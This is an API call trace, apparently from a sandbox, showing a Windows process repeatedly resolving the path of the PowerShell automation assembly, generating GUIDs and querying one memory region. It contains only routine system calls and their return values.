	[0379.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.463] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0xd35c1181, Data2=0xe0a8, Data3=0x4e2a, Data4=([0]=0x93, [1]=0xe1, [2]=0x3a, [3]=0x9a, [4]=0xdc, [5]=0x45, [6]=0x1b, [7]=0xc6))) returned 0x0
	[0379.463] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0xadcd80e3, Data2=0xcba4, Data3=0x4738, Data4=([0]=0x95, [1]=0xfe, [2]=0x27, [3]=0xca, [4]=0x70, [5]=0x2c, [6]=0x6e, [7]=0x5f))) returned 0x0
	[0379.463] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0xb2486ea5, Data2=0xc7a2, Data3=0x48cb, Data4=([0]=0xb6, [1]=0x54, [2]=0x85, [3]=0x65, [4]=0x6, [5]=0xdb, [6]=0xdb, [7]=0x8a))) returned 0x0
	[0379.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.464] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0xe38597d0, Data2=0x926d, Data3=0x4c04, Data4=([0]=0x8c, [1]=0x87, [2]=0x5f, [3]=0xda, [4]=0x7a, [5]=0x89, [6]=0xdd, [7]=0xab))) returned 0x0
	[0379.464] VirtualQuery (in: lpAddress=0x14b110, lpBuffer=0x14bfd0, dwLength=0x30 | out: lpBuffer=0x14bfd0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.465] VirtualQuery (in: lpAddress=0x14b110, lpBuffer=0x14bfd0, dwLength=0x30 | out: lpBuffer=0x14bfd0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.465] VirtualQuery (in: lpAddress=0x14b1a0, lpBuffer=0x14c060, dwLength=0x30 | out: lpBuffer=0x14c060*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.465] VirtualQuery (in: lpAddress=0x14b110, lpBuffer=0x14bfd0, dwLength=0x30 | out: lpBuffer=0x14bfd0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.465] VirtualQuery (in: lpAddress=0x14b1a0, lpBuffer=0x14c060, dwLength=0x30 | out: lpBuffer=0x14c060*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.466] VirtualQuery (in: lpAddress=0x14b110, lpBuffer=0x14bfd0, dwLength=0x30 | out: lpBuffer=0x14bfd0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.466] VirtualQuery (in: lpAddress=0x14b1a0, lpBuffer=0x14c060, dwLength=0x30 | out: lpBuffer=0x14c060*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.466] VirtualQuery (in: lpAddress=0x14b110, lpBuffer=0x14bfd0, dwLength=0x30 | out: lpBuffer=0x14bfd0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.466] VirtualQuery (in: lpAddress=0x14b1a0, lpBuffer=0x14c060, dwLength=0x30 | out: lpBuffer=0x14c060*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.466] VirtualQuery (in: lpAddress=0x14b110, lpBuffer=0x14bfd0, dwLength=0x30 | out: lpBuffer=0x14bfd0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.466] VirtualQuery (in: lpAddress=0x14b1a0, lpBuffer=0x14c060, dwLength=0x30 | out: lpBuffer=0x14c060*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.467] VirtualQuery (in: lpAddress=0x14b110, lpBuffer=0x14bfd0, dwLength=0x30 | out: lpBuffer=0x14bfd0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.467] VirtualQuery (in: lpAddress=0x14b1a0, lpBuffer=0x14c060, dwLength=0x30 | out: lpBuffer=0x14c060*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.467] VirtualQuery (in: lpAddress=0x14ba10, lpBuffer=0x14c8d0, dwLength=0x30 | out: lpBuffer=0x14c8d0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.467] VirtualQuery (in: lpAddress=0x14baa0, lpBuffer=0x14c960, dwLength=0x30 | out: lpBuffer=0x14c960*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.467] VirtualQuery (in: lpAddress=0x14ba10, lpBuffer=0x14c8d0, dwLength=0x30 | out: lpBuffer=0x14c8d0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.467] VirtualQuery (in: lpAddress=0x14baa0, lpBuffer=0x14c960, dwLength=0x30 | out: lpBuffer=0x14c960*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.467] VirtualQuery (in: lpAddress=0x14baa0, lpBuffer=0x14c960, dwLength=0x30 | out: lpBuffer=0x14c960*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.468] VirtualQuery (in: lpAddress=0x14ba10, lpBuffer=0x14c8d0, dwLength=0x30 | out: lpBuffer=0x14c8d0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.468] VirtualQuery (in: lpAddress=0x14baa0, lpBuffer=0x14c960, dwLength=0x30 | out: lpBuffer=0x14c960*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.468] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0xf0fe6b2b, Data2=0x58d9, Data3=0x44f7, Data4=([0]=0xa8, [1]=0xa6, [2]=0xb8, [3]=0x4, [4]=0x33, [5]=0x50, [6]=0x97, [7]=0xc5))) returned 0x0
	[0379.468] VirtualQuery (in: lpAddress=0x14ba20, lpBuffer=0x14c8e0, dwLength=0x30 | out: lpBuffer=0x14c8e0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.468] VirtualQuery (in: lpAddress=0x14ba20, lpBuffer=0x14c8e0, dwLength=0x30 | out: lpBuffer=0x14c8e0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.468] VirtualQuery (in: lpAddress=0x14bab0, lpBuffer=0x14c970, dwLength=0x30 | out: lpBuffer=0x14c970*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.468] VirtualQuery (in: lpAddress=0x14ba20, lpBuffer=0x14c8e0, dwLength=0x30 | out: lpBuffer=0x14c8e0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.468] VirtualQuery (in: lpAddress=0x14bab0, lpBuffer=0x14c970, dwLength=0x30 | out: lpBuffer=0x14c970*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.468] VirtualQuery (in: lpAddress=0x14ba20, lpBuffer=0x14c8e0, dwLength=0x30 | out: lpBuffer=0x14c8e0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.469] VirtualQuery (in: lpAddress=0x14bab0, lpBuffer=0x14c970, dwLength=0x30 | out: lpBuffer=0x14c970*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.469] VirtualQuery (in: lpAddress=0x14ba20, lpBuffer=0x14c8e0, dwLength=0x30 | out: lpBuffer=0x14c8e0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.469] VirtualQuery (in: lpAddress=0x14bab0, lpBuffer=0x14c970, dwLength=0x30 | out: lpBuffer=0x14c970*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.469] VirtualQuery (in: lpAddress=0x14ba20, lpBuffer=0x14c8e0, dwLength=0x30 | out: lpBuffer=0x14c8e0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.469] VirtualQuery (in: lpAddress=0x14bab0, lpBuffer=0x14c970, dwLength=0x30 | out: lpBuffer=0x14c970*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.469] VirtualQuery (in: lpAddress=0x14ba20, lpBuffer=0x14c8e0, dwLength=0x30 | out: lpBuffer=0x14c8e0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.469] VirtualQuery (in: lpAddress=0x14bab0, lpBuffer=0x14c970, dwLength=0x30 | out: lpBuffer=0x14c970*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.469] VirtualQuery (in: lpAddress=0x14ba10, lpBuffer=0x14c8d0, dwLength=0x30 | out: lpBuffer=0x14c8d0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.469] VirtualQuery (in: lpAddress=0x14baa0, lpBuffer=0x14c960, dwLength=0x30 | out: lpBuffer=0x14c960*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.470] VirtualQuery (in: lpAddress=0x14ba10, lpBuffer=0x14c8d0, dwLength=0x30 | out: lpBuffer=0x14c8d0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.470] VirtualQuery (in: lpAddress=0x14baa0, lpBuffer=0x14c960, dwLength=0x30 | out: lpBuffer=0x14c960*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.470] VirtualQuery (in: lpAddress=0x14baa0, lpBuffer=0x14c960, dwLength=0x30 | out: lpBuffer=0x14c960*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.470] VirtualQuery (in: lpAddress=0x14ba10, lpBuffer=0x14c8d0, dwLength=0x30 | out: lpBuffer=0x14c8d0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.470] VirtualQuery (in: lpAddress=0x14baa0, lpBuffer=0x14c960, dwLength=0x30 | out: lpBuffer=0x14c960*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.470] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x3f9dae54, Data2=0x6ab2, Data3=0x4d04, Data4=([0]=0x8e, [1]=0x3b, [2]=0xe2, [3]=0xff, [4]=0xbc, [5]=0xb1, [6]=0x7b, [7]=0xd4))) returned 0x0
	[0379.470] VirtualQuery (in: lpAddress=0x14ba10, lpBuffer=0x14c8d0, dwLength=0x30 | out: lpBuffer=0x14c8d0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.470] VirtualQuery (in: lpAddress=0x14baa0, lpBuffer=0x14c960, dwLength=0x30 | out: lpBuffer=0x14c960*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.471] VirtualQuery (in: lpAddress=0x14ba10, lpBuffer=0x14c8d0, dwLength=0x30 | out: lpBuffer=0x14c8d0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.471] VirtualQuery (in: lpAddress=0x14baa0, lpBuffer=0x14c960, dwLength=0x30 | out: lpBuffer=0x14c960*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.471] VirtualQuery (in: lpAddress=0x14baa0, lpBuffer=0x14c960, dwLength=0x30 | out: lpBuffer=0x14c960*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.471] VirtualQuery (in: lpAddress=0x14ba10, lpBuffer=0x14c8d0, dwLength=0x30 | out: lpBuffer=0x14c8d0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.471] VirtualQuery (in: lpAddress=0x14baa0, lpBuffer=0x14c960, dwLength=0x30 | out: lpBuffer=0x14c960*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.471] VirtualQuery (in: lpAddress=0x14ba10, lpBuffer=0x14c8d0, dwLength=0x30 | out: lpBuffer=0x14c8d0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.471] VirtualQuery (in: lpAddress=0x14baa0, lpBuffer=0x14c960, dwLength=0x30 | out: lpBuffer=0x14c960*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.471] VirtualQuery (in: lpAddress=0x14ba10, lpBuffer=0x14c8d0, dwLength=0x30 | out: lpBuffer=0x14c8d0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.472] VirtualQuery (in: lpAddress=0x14baa0, lpBuffer=0x14c960, dwLength=0x30 | out: lpBuffer=0x14c960*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
